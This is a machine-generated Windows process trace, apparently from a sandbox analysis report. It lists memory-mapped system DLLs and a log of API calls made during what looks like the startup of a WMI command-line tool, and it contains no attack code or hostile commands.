start_va = 0x75060000
end_va = 0x7506dfff
entry_point = 0x75060000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 285
start_va = 0x2130000
end_va = 0x216ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002130000"
filename = ""
Region:
id = 286
start_va = 0x2180000
end_va = 0x21bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002180000"
filename = ""
Region:
id = 287
start_va = 0x21f0000
end_va = 0x222ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000021f0000"
filename = ""
Region:
id = 288
start_va = 0x7ffd9000
end_va = 0x7ffd9fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd9000"
filename = ""
Region:
id = 289
start_va = 0x7ffda000
end_va = 0x7ffdafff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffda000"
filename = ""
Region:
id = 290
start_va = 0x7ffdb000
end_va = 0x7ffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdb000"
filename = ""
Region:
id = 291
start_va = 0x550000
end_va = 0x550fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000550000"
filename = ""
Region:
id = 292
start_va = 0x70eb0000
end_va = 0x70f52fff
entry_point = 0x70eb0000
region_type = mapped_file
name = "msvcr90.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcr90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcr90.dll")
Region:
id = 293
start_va = 0x71ae0000
end_va = 0x71aecfff
entry_point = 0x71ae0000
region_type = mapped_file
name = "msoxmlmf.dll"
filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE14\\MSOXMLMF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxmlmf.dll")
Region:
id = 294
start_va = 0x810000
end_va = 0x81ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000810000"
filename = ""
Region:
id = 295
start_va = 0x6e450000
end_va = 0x6e45efff
entry_point = 0x6e450000
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 560
start_va = 0x6e5b0000
end_va = 0x6e645fff
entry_point = 0x6e5b0000
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 561
start_va = 0x6e590000
end_va = 0x6e5a7fff
entry_point = 0x6e590000
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 562
start_va = 0x5b0000
end_va = 0x5cffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005b0000"
filename = ""
Region:
id = 563
start_va = 0x5e0000
end_va = 0x61ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000005e0000"
filename = ""
Region:
id = 564
start_va = 0x2230000
end_va = 0x232ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002230000"
filename = ""
Region:
id = 642
start_va = 0x6e3e0000
end_va = 0x6e3f6fff
entry_point = 0x6e3e0000
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 643
start_va = 0x560000
end_va = 0x564fff
entry_point = 0x560000
region_type = mapped_file
name = "wmiutils.dll.mui"
filename = "\\Windows\\System32\\wbem\\en-US\\wmiutils.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\wmiutils.dll.mui")
Region:
id = 644
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 645
start_va = 0x5b0000
end_va = 0x5b7fff
entry_point = 0x5b0000
region_type = mapped_file
name = "urlmon.dll.mui"
filename = "\\Windows\\System32\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\urlmon.dll.mui")
Region:
id = 646
start_va = 0x728a0000
end_va = 0x728f1fff
entry_point = 0x728a0000
region_type = mapped_file
name = "rasapi32.dll"
filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll")
Region:
id = 647
start_va = 0x72880000
end_va = 0x72894fff
entry_point = 0x72880000
region_type = mapped_file
name = "rasman.dll"
filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll")
Region:
id = 648
start_va = 0x73080000
end_va = 0x7308cfff
entry_point = 0x73080000
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")
Region:
id = 649
start_va = 0x5c0000
end_va = 0x5c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000005c0000"
filename = ""
Region:
id = 650
start_va = 0x830000
end_va = 0x86ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000830000"
filename = ""
Region:
id = 651
start_va = 0x7ffd8000
end_va = 0x7ffd8fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd8000"
filename = ""
Region:
id = 652
start_va = 0x5c0000
end_va = 0x5c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005c0000"
filename = ""
Region:
id = 653
start_va = 0x73270000
end_va = 0x73275fff
entry_point = 0x73270000
region_type = mapped_file
name = "sensapi.dll"
filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll")
Region:
id = 654
start_va = 0x2060000
end_va = 0x209ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002060000"
filename = ""
Region:
id = 655
start_va = 0x74b00000
end_va = 0x74b3bfff
entry_point = 0x74b00000
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 656
start_va = 0x7ffd7000
end_va = 0x7ffd7fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd7000"
filename = ""
Region:
id = 657
start_va = 0x74650000
end_va = 0x74654fff
entry_point = 0x74650000
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Region:
id = 658
start_va = 0x75c60000
end_va = 0x75c62fff
entry_point = 0x75c60000
region_type = mapped_file
name = "normaliz.dll"
filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll")
Region:
id = 659
start_va = 0x5d0000
end_va = 0x5d0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005d0000"
filename = ""
Region:
id = 660
start_va = 0x74070000
end_va = 0x7407ffff
entry_point = 0x74070000
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 661
start_va = 0x2330000
end_va = 0x24cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002330000"
filename = ""
Region:
id = 662
start_va = 0x2330000
end_va = 0x244ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002330000"
filename = ""
Region:
id = 663
start_va = 0x24c0000
end_va = 0x24cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000024c0000"
filename = ""
Region:
id = 664
start_va = 0x7d0000
end_va = 0x7fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000007d0000"
filename = ""
Region:
id = 665
start_va = 0x70020000
end_va = 0x70025fff
entry_point = 0x70020000
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 666
start_va = 0x7d0000
end_va = 0x80ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000007d0000"
filename = ""
Region:
id = 667
start_va = 0x73280000
end_va = 0x7328ffff
entry_point = 0x73280000
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 668
start_va = 0x7ffd5000
end_va = 0x7ffd5fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd5000"
filename = ""
Region:
id = 669
start_va = 0x73250000
end_va = 0x73261fff
entry_point = 0x73250000
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 670
start_va = 0x73240000
end_va = 0x73247fff
entry_point = 0x73240000
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 671
start_va = 0x74af0000
end_va = 0x74af5fff
entry_point = 0x74af0000
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")
Region:
id = 672
start_va = 0x73c20000
end_va = 0x73c57fff
entry_point = 0x73c20000
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 673
start_va = 0x25f0000
end_va = 0x262ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 674
start_va = 0x6e0d0000
end_va = 0x6e129fff
entry_point = 0x6e0d0000
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 675
start_va = 0x6dfb0000
end_va = 0x6dfb7fff
entry_point = 0x6dfb0000
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 800
start_va = 0x73c00000
end_va = 0x73c11fff
entry_point = 0x73c00000
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 801
start_va = 0x73c70000
end_va = 0x73c7cfff
entry_point = 0x73c70000
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 802
start_va = 0x730000
end_va = 0x740fff
entry_point = 0x730000
region_type = mapped_file
name = "c_20127.nls"
filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls")
Region:
id = 803
start_va = 0x2460000
end_va = 0x249ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002460000"
filename = ""
Region:
id = 804
start_va = 0x7ffd4000
end_va = 0x7ffd4fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd4000"
filename = ""
Region:
id = 805
start_va = 0x6d290000
end_va = 0x6d341fff
entry_point = 0x6d290000
region_type = mapped_file
name = "jscript.dll"
filename = "\\Windows\\System32\\jscript.dll" (normalized: "c:\\windows\\system32\\jscript.dll")
Region:
id = 806
start_va = 0x620000
end_va = 0x620fff
entry_point = 0x620000
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 807
start_va = 0x2630000
end_va = 0x2a22fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002630000"
filename = ""
Region:
id = 808
start_va = 0x620000
end_va = 0x620fff
entry_point = 0x620000
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 809
start_va = 0x71b00000
end_va = 0x71b29fff
entry_point = 0x71b00000
region_type = mapped_file
name = "scrrun.dll"
filename = "\\Windows\\System32\\scrrun.dll" (normalized: "c:\\windows\\system32\\scrrun.dll")
Region:
id = 810
start_va = 0x74fd0000
end_va = 0x7502efff
entry_point = 0x74fd0000
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 811
start_va = 0x870000
end_va = 0x884fff
entry_point = 0x870000
region_type = mapped_file
name = "scrrun.dll"
filename = "\\Windows\\System32\\scrrun.dll" (normalized: "c:\\windows\\system32\\scrrun.dll")
Region:
id = 812
start_va = 0x6f6d0000
end_va = 0x6f6f0fff
entry_point = 0x6f6d0000
region_type = mapped_file
name = "wshom.ocx"
filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx")
Region:
id = 813
start_va = 0x719f0000
end_va = 0x71a01fff
entry_point = 0x719f0000
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")
Region:
id = 814
start_va = 0x18d0000
end_va = 0x18e2fff
entry_point = 0x18d0000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 815
start_va = 0x74290000
end_va = 0x74384fff
entry_point = 0x74290000
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 816
start_va = 0x620000
end_va = 0x621fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000620000"
filename = ""
Region:
id = 817
start_va = 0x820000
end_va = 0x823fff
entry_point = 0x820000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 818
start_va = 0x18f0000
end_va = 0x18f0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000018f0000"
filename = ""
Region:
id = 819
start_va = 0x1940000
end_va = 0x195efff
entry_point = 0x1940000
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001a.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db")
Region:
id = 820
start_va = 0x1960000
end_va = 0x1963fff
entry_point = 0x1960000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 821
start_va = 0x1b40000
end_va = 0x1b6ffff
entry_point = 0x1b40000
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db")
Region:
id = 822
start_va = 0x2380000
end_va = 0x23e5fff
entry_point = 0x2380000
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 823
start_va = 0x2440000
end_va = 0x244ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002440000"
filename = ""
Region:
id = 824
start_va = 0x2a40000
end_va = 0x2a7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a40000"
filename = ""
Region:
id = 825
start_va = 0x752d0000
end_va = 0x752f6fff
entry_point = 0x752d0000
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 826
start_va = 0x75300000
end_va = 0x75311fff
entry_point = 0x75300000
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 827
start_va = 0x76c00000
end_va = 0x76d9cfff
entry_point = 0x76c00000
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 828
start_va = 0x7ffd3000
end_va = 0x7ffd3fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd3000"
filename = ""
Thread:
id = 2
os_tid = 0x9a8
[0035.539] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fcfc | out: lpSystemTimeAsFileTime=0x12fcfc*(dwLowDateTime=0xca0d1390, dwHighDateTime=0x1d469c7))
[0035.539] GetCurrentProcessId () returned 0x9a4
[0035.539] GetCurrentThreadId () returned 0x9a8
[0035.539] GetTickCount () returned 0x18c28
[0035.539] QueryPerformanceCounter (in: lpPerformanceCount=0x12fcf4 | out: lpPerformanceCount=0x12fcf4*=1810948500000) returned 1
[0035.540] GetModuleHandleA (lpModuleName=0x0) returned 0x890000
[0035.540] __set_app_type (_Type=0x1)
[0035.540] __p__fmode () returned 0x757a31f4
[0035.540] __p__commode () returned 0x757a31fc
[0035.540] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x8cdc15) returned 0x0
[0035.541] __wgetmainargs (in: _Argc=0x8dc5e8, _Argv=0x8dc5f0, _Env=0x8dc5ec, _DoWildCard=0, _StartInfo=0x8dc5fc | out: _Argc=0x8dc5e8, _Argv=0x8dc5f0, _Env=0x8dc5ec) returned 0
[0035.554] ??0CHString@@QAE@XZ () returned 0x8dc28c
[0035.556] ??0CHString@@QAE@XZ () returned 0x8dc594
[0035.556] ?Empty@CHString@@QAEXXZ () returned 0x6f900504
[0035.556] SetConsoleCtrlHandler (HandlerRoutine=0x8c6b6f, Add=1) returned 1
[0035.556] _onexit (_Func=0x8d2f1f) returned 0x8d2f1f
[0035.557] _onexit (_Func=0x8d2f2e) returned 0x8d2f2e
[0035.557] _onexit (_Func=0x8d2f42) returned 0x8d2f42
[0035.557] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0035.557] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0036.228] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
[0036.234] CoCreateInstance (in: rclsid=0x896c60*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x896b90*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8dc1b0 | out: ppv=0x8dc1b0*=0x630828) returned 0x0
[0036.695] GetCurrentProcess () returned 0xffffffff
[0036.695] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x12fba4 | out: TokenHandle=0x12fba4*=0xf4) returned 1
[0036.695] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fba0 | out: TokenInformation=0x0, ReturnLength=0x12fba0) returned 0
[0036.695] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x182c40, TokenInformationLength=0x118, ReturnLength=0x12fba0 | out: TokenInformation=0x182c40, ReturnLength=0x12fba0) returned 1
[0036.695] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x182c40*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0036.695] CloseHandle (hObject=0xf4) returned 1
[0036.696] GetSystemDirectoryW (in: lpBuffer=0x182d18, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0036.697] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13
[0036.697] SysStringLen (param_1="\\kernel32.dll") returned 0xd
[0036.697] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x75370000
[0036.697] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadUILanguage") returned 0x753c24c2
[0036.697] SetThreadUILanguage (LangId=0x0) returned 0x409
[0036.697] FreeLibrary (hLibModule=0x75370000) returned 1
[0036.697] _vsnwprintf (in: _Buffer=0x182cd0, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x12fb00 | out: _Buffer="ms_409") returned 6
[0036.697] GetComputerNameW (in: lpBuffer=0x182d18, nSize=0x12fb58 | out: lpBuffer="CRH2YWU7", nSize=0x12fb58) returned 1
[0036.698] lstrlenW (lpString="CRH2YWU7") returned 8
[0036.698] lstrlenW (lpString="CRH2YWU7") returned 8
[0036.698] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x12fb94 | out: lpNameBuffer=0x0, nSize=0x12fb94) returned 0x0
[0036.698] GetLastError () returned 0xea
[0036.698] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x182d60, nSize=0x12fb94 | out: lpNameBuffer="CRH2YWU7\\EEBsYm5", nSize=0x12fb94) returned 0x1
[0036.699] lstrlenW (lpString="") returned 0
[0036.699] lstrlenW (lpString="CRH2YWU7") returned 8
[0036.699] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CRH2YWU7", cchCount1=8, lpString2="", cchCount2=0) returned 3
[0036.701] lstrlenW (lpString=".") returned 1
[0036.701] lstrlenW (lpString="CRH2YWU7") returned 8
[0036.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CRH2YWU7", cchCount1=8, lpString2=".", cchCount2=1) returned 3
[0036.701] lstrlenW (lpString="LOCALHOST") returned 9
[0036.701] lstrlenW (lpString="CRH2YWU7") returned 8
[0036.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CRH2YWU7", cchCount1=8, lpString2="LOCALHOST", cchCount2=9) returned 1
[0036.701] lstrlenW (lpString="CRH2YWU7") returned 8
[0036.701] lstrlenW (lpString="CRH2YWU7") returned 8
[0036.701] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CRH2YWU7", cchCount1=8, lpString2="CRH2YWU7", cchCount2=8) returned 2
[0036.701] lstrlenW (lpString="CRH2YWU7") returned 8
[0036.701] lstrlenW (lpString="CRH2YWU7") returned 8
[0036.701] lstrlenW (lpString="CRH2YWU7") returned 8
[0036.701] lstrlenW (lpString="CRH2YWU7") returned 8
[0036.701] SysStringLen (param_1="IDENTIFY") returned 0x8
[0036.701] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0036.701] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0036.701] SysStringLen (param_1="IDENTIFY") returned 0x8
[0036.701] SysStringLen (param_1="IMPERSONATE") returned 0xb
[0036.702] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0036.702] SysStringLen (param_1="IMPERSONATE") returned 0xb
[0036.702] SysStringLen (param_1="IDENTIFY") returned 0x8
[0036.702] SysStringLen (param_1="IDENTIFY") returned 0x8
[0036.702] SysStringLen (param_1="IMPERSONATE") returned 0xb
[0036.702] SysStringLen (param_1="DELEGATE") returned 0x8
[0036.702] SysStringLen (param_1="IDENTIFY") returned 0x8
[0036.702] SysStringLen (param_1="DELEGATE") returned 0x8
[0036.702] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0036.702] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0036.702] SysStringLen (param_1="DELEGATE") returned 0x8
[0036.702] SysStringLen (param_1="NONE") returned 0x4
[0036.702] SysStringLen (param_1="DEFAULT") returned 0x7
[0036.702] SysStringLen (param_1="DEFAULT") returned 0x7
[0036.702] SysStringLen (param_1="NONE") returned 0x4
[0036.703] SysStringLen (param_1="CONNECT") returned 0x7
[0036.703] SysStringLen (param_1="DEFAULT") returned 0x7
[0036.703] SysStringLen (param_1="CALL") returned 0x4
[0036.703] SysStringLen (param_1="DEFAULT") returned 0x7
[0036.703] SysStringLen (param_1="CALL") returned 0x4
[0036.703] SysStringLen (param_1="CONNECT") returned 0x7
[0036.704] SysStringLen (param_1="PKT") returned 0x3
[0036.704] SysStringLen (param_1="DEFAULT") returned 0x7
[0036.704] SysStringLen (param_1="PKT") returned 0x3
[0036.704] SysStringLen (param_1="NONE") returned 0x4
[0036.704] SysStringLen (param_1="NONE") returned 0x4
[0036.704] SysStringLen (param_1="PKT") returned 0x3
[0036.704] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0036.704] SysStringLen (param_1="DEFAULT") returned 0x7
[0036.704] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0036.704] SysStringLen (param_1="NONE") returned 0x4
[0036.704] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0036.704] SysStringLen (param_1="PKT") returned 0x3
[0036.704] SysStringLen (param_1="PKT") returned 0x3
[0036.704] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0036.704] SysStringLen (param_1="PKTPRIVACY") returned 0xa
[0036.704] SysStringLen (param_1="DEFAULT") returned 0x7
[0036.704] SysStringLen (param_1="PKTPRIVACY") returned 0xa
[0036.704] SysStringLen (param_1="PKT") returned 0x3
[0036.704] SysStringLen (param_1="PKTPRIVACY") returned 0xa
[0036.704] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0036.704] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0036.704] SysStringLen (param_1="PKTPRIVACY") returned 0xa
[0036.704] GetSystemDirectoryW (in: lpBuffer=0x18ecc8, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0036.705] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13
[0036.705] SysStringLen (param_1="\\wbem\\") returned 0x6
[0036.705] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32
[0036.705] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19
[0036.705] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10
[0036.705] GetCurrentThreadId () returned 0x9a8
[0036.705] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x12f6b0 | out: phkResult=0x12f6b0*=0xf8) returned 0x0
[0036.706] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x12f6bc, lpcbData=0x12f6b8*=0x400 | out: lpType=0x0, lpData=0x12f6bc*=0x30, lpcbData=0x12f6b8*=0x4) returned 0x0
[0036.706] _wcsicmp (_String1="0", _String2="1") returned -1
[0036.706] _wcsicmp (_String1="0", _String2="2") returned -2
